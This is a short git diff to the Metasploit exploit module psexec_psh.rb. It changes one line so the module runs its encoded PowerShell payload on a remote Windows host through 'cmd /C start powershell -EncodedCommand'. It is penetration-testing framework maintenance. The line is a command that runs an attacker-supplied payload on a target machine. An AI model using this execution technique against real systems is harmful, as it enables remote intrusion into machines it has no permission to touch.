diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 99dc381775..666181292e 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -270,6 +270,6 @@ class Metasploit3 < Msf::Exploit::Remote psh_payload = compress_script(psh_payload) # Determine appropriate architecture ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' - command = "%COMSPEC% /C #{ps_bin} -EncodedCommand #{psh_payload}" + command = "%COMSPEC% /C start #{ps_bin} -EncodedCommand #{psh_payload}" end end